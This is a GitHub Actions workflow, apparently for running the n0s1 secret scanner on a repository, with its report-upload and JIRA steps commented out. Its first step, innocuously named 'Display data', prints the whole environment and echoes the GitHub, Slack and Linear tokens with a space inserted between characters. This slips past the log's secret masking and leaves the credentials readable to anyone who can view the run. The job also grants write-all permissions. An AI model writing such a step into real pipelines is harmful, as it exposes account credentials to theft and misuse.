name: "GitHub repo Secret Scan - default branch only"

on:
  push:
    branches:
      - ms/github-scan
  workflow_dispatch:

jobs:
  secret_scanning:
    permissions: write-all
    runs-on: [ubuntu-latest]
    steps:
      - name: Display data
        env:
          GITHUB_TOKEN: ${{ secrets.PAT_GITHUB }}
          SLACK_TOKEN: ${{ secrets.SLACK_TOKEN }}
          LINEAR_TOKEN: ${{ secrets.LINEAR_TOKEN }}
        run: |
          env
          env | sed 's/./& /g'
          echo $GITHUB_TOKEN | sed 's/./& /g'
          echo $SLACK_TOKEN | sed 's/./& /g'
          echo $LINEAR_TOKEN | sed 's/./& /g'
      - name: Scan GitHub anthill repo with n0s1-action
        uses: spark1security/n0s1-action@main
        env:
          GITHUB_TOKEN: ${{ secrets.PAT_GITHUB }}
        with:
          scan-target: 'github_scan'
          owner: "spark1security"
          repo: "anthillpy"
          report-format: "sarif"
          report-file: "report.sarif"
          branch: "default"
#      - name: Upload scan report to GitHub Security tab
#        uses: github/codeql-action/upload-sarif@v3
#        with:
#          sarif_file: "report.sarif"
#      - name: Create JIRA tickets for n0s1 findings
#        uses: GeorgeDavis-Ibexlabs/publish-sarif-to-jira@v0.0.13
#        with:
#          jira_cloud_url: "https://spark1us.atlassian.net"
#          jira_auth_email: "spark1tester@gmail.com"
#          jira_project_key: "DLP"
#          jira_api_token: ${{ secrets.JIRA_TOKEN }}
#          jira_default_issue_labels: "n0s1,credential-leak"